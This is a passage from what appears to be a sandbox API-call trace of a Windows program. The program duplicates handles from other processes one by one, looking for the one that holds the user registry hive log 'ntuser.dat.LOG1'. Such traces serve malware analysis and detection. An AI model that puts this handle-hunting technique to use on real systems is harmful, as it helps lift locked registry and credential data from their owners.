[0161.170] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.171] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.171] CloseHandle (hObject=0x1e4) returned 1 [0161.171] CloseHandle (hObject=0x194) returned 1 [0161.171] CloseHandle (hObject=0x1e8) returned 1 [0161.171] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.171] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.171] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.172] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.172] CloseHandle (hObject=0x1e4) returned 1 [0161.172] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.172] CloseHandle (hObject=0x194) returned 1 [0161.172] CloseHandle (hObject=0x1e8) returned 1 [0161.172] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0161.172] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.172] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.173] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.174] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.174] CloseHandle (hObject=0x1e4) returned 1 [0161.174] CloseHandle (hObject=0x194) returned 1 [0161.174] CloseHandle (hObject=0x1e8) returned 1 [0161.174] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.174] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.175] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.176] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.176] CloseHandle (hObject=0x1e4) returned 1 [0161.176] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.176] CloseHandle (hObject=0x194) returned 1 [0161.176] CloseHandle (hObject=0x1e8) returned 1 [0161.176] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.176] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.177] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.178] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.178] CloseHandle (hObject=0x1e4) returned 1 [0161.178] CloseHandle (hObject=0x194) returned 1 [0161.178] CloseHandle (hObject=0x1e8) returned 1 [0161.178] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.178] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.179] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.179] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.180] CloseHandle (hObject=0x1e4) returned 1 [0161.180] CloseHandle (hObject=0x194) returned 1 [0161.180] CloseHandle (hObject=0x1e8) returned 1 [0161.180] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.180] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.181] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.181] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.181] CloseHandle (hObject=0x1e4) returned 1 [0161.181] CloseHandle (hObject=0x194) returned 1 [0161.182] CloseHandle (hObject=0x1e8) returned 1 [0161.182] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.182] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.186] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.187] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.187] CloseHandle (hObject=0x1e4) returned 1 [0161.187] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.187] CloseHandle (hObject=0x194) returned 1 [0161.188] CloseHandle (hObject=0x1e8) returned 1 [0161.188] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.188] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.188] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.189] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.189] CloseHandle (hObject=0x1e4) returned 1 [0161.189] CloseHandle (hObject=0x194) returned 1 [0161.189] CloseHandle (hObject=0x1e8) returned 1 [0161.189] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.189] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.190] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.191] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.191] CloseHandle (hObject=0x1e4) returned 1 [0161.191] _wcsicmp (_Str1="\\atsvc", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.191] CloseHandle (hObject=0x194) returned 1 [0161.191] CloseHandle (hObject=0x1e8) returned 1 [0161.191] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.191] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.191] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.192] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.193] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.193] CloseHandle (hObject=0x1e4) returned 1 [0161.193] _wcsicmp (_Str1="\\Tasks", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.193] CloseHandle (hObject=0x194) returned 1 [0161.193] CloseHandle (hObject=0x1e8) returned 1 [0161.193] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.193] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.194] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.195] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.195] CloseHandle (hObject=0x1e4) returned 1 [0161.195] _wcsicmp (_Str1="\\atsvc", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.195] CloseHandle (hObject=0x194) returned 1 [0161.195] CloseHandle (hObject=0x1e8) returned 1 [0161.195] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.195] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.196] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.197] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.197] CloseHandle (hObject=0x1e4) returned 1 [0161.197] _wcsicmp (_Str1="\\atsvc", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.197] CloseHandle (hObject=0x194) returned 1 [0161.197] CloseHandle (hObject=0x1e8) returned 1 [0161.197] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.197] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.198] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.199] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.199] CloseHandle (hObject=0x1e4) returned 1 [0161.199] CloseHandle (hObject=0x194) returned 1 [0161.199] CloseHandle (hObject=0x1e8) returned 1 [0161.199] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.199] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.200] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.201] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.201] CloseHandle (hObject=0x1e4) returned 1 [0161.201] CloseHandle (hObject=0x194) returned 1 [0161.201] CloseHandle (hObject=0x1e8) returned 1 [0161.201] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.201] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.202] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.203] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.203] CloseHandle (hObject=0x1e4) returned 1 [0161.203] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.203] CloseHandle (hObject=0x194) returned 1 [0161.203] CloseHandle (hObject=0x1e8) returned 1 [0161.203] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.203] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.203] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.204] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.205] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.205] CloseHandle (hObject=0x1e4) returned 1 [0161.205] CloseHandle (hObject=0x194) returned 1 [0161.205] CloseHandle (hObject=0x1e8) returned 1 [0161.205] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.205] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.205] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.206] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.206] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.207] CloseHandle (hObject=0x1e4) returned 1 [0161.207] CloseHandle (hObject=0x194) returned 1 [0161.207] CloseHandle (hObject=0x1e8) returned 1 [0161.207] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.207] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.207] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.207] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.208] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.208] CloseHandle (hObject=0x1e4) returned 1 [0161.208] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.208] CloseHandle (hObject=0x194) returned 1 [0161.208] CloseHandle (hObject=0x1e8) returned 1 [0161.209] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.209] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.209] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.210] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.210] CloseHandle (hObject=0x1e4) returned 1 [0161.210] _wcsicmp (_Str1="\\MOF", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.210] CloseHandle (hObject=0x194) returned 1 [0161.210] CloseHandle (hObject=0x1e8) returned 1 [0161.211] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.211] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.211] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.212] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.212] CloseHandle (hObject=0x1e4) returned 1 [0161.212] CloseHandle (hObject=0x194) returned 1 [0161.212] CloseHandle (hObject=0x1e8) returned 1 [0161.212] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.212] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.212] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.213] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.214] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.214] CloseHandle (hObject=0x1e4) returned 1 [0161.214] CloseHandle (hObject=0x194) returned 1 [0161.214] CloseHandle (hObject=0x1e8) returned 1 [0161.214] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.214] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.219] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.220] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.220] CloseHandle (hObject=0x1e4) returned 1 [0161.220] CloseHandle (hObject=0x194) returned 1 [0161.220] CloseHandle (hObject=0x1e8) returned 1 [0161.220] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.220] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.223] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.224] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.224] CloseHandle (hObject=0x1e4) returned 1 [0161.224] CloseHandle (hObject=0x194) returned 1 [0161.224] CloseHandle (hObject=0x1e8) returned 1 [0161.224] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.224] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.225] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.228] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.230] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.230] CloseHandle (hObject=0x1e4) returned 1 [0161.230] CloseHandle (hObject=0x194) returned 1 [0161.230] CloseHandle (hObject=0x1e8) returned 1 [0161.230] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.230] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.230] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.231] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.231] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.232] CloseHandle (hObject=0x1e4) returned 1 [0161.232] CloseHandle (hObject=0x194) returned 1 [0161.232] CloseHandle (hObject=0x1e8) returned 1 [0161.232] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.232] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.232] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.233] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.233] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.233] CloseHandle (hObject=0x1e4) returned 1 [0161.234] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.234] CloseHandle (hObject=0x194) returned 1 [0161.234] CloseHandle (hObject=0x1e8) returned 1 [0161.234] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.234] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.235] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.235] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.236] CloseHandle (hObject=0x1e4) returned 1 [0161.236] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.236] CloseHandle (hObject=0x194) returned 1 [0161.236] CloseHandle (hObject=0x1e8) returned 1 [0161.236] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0161.236] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.237] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 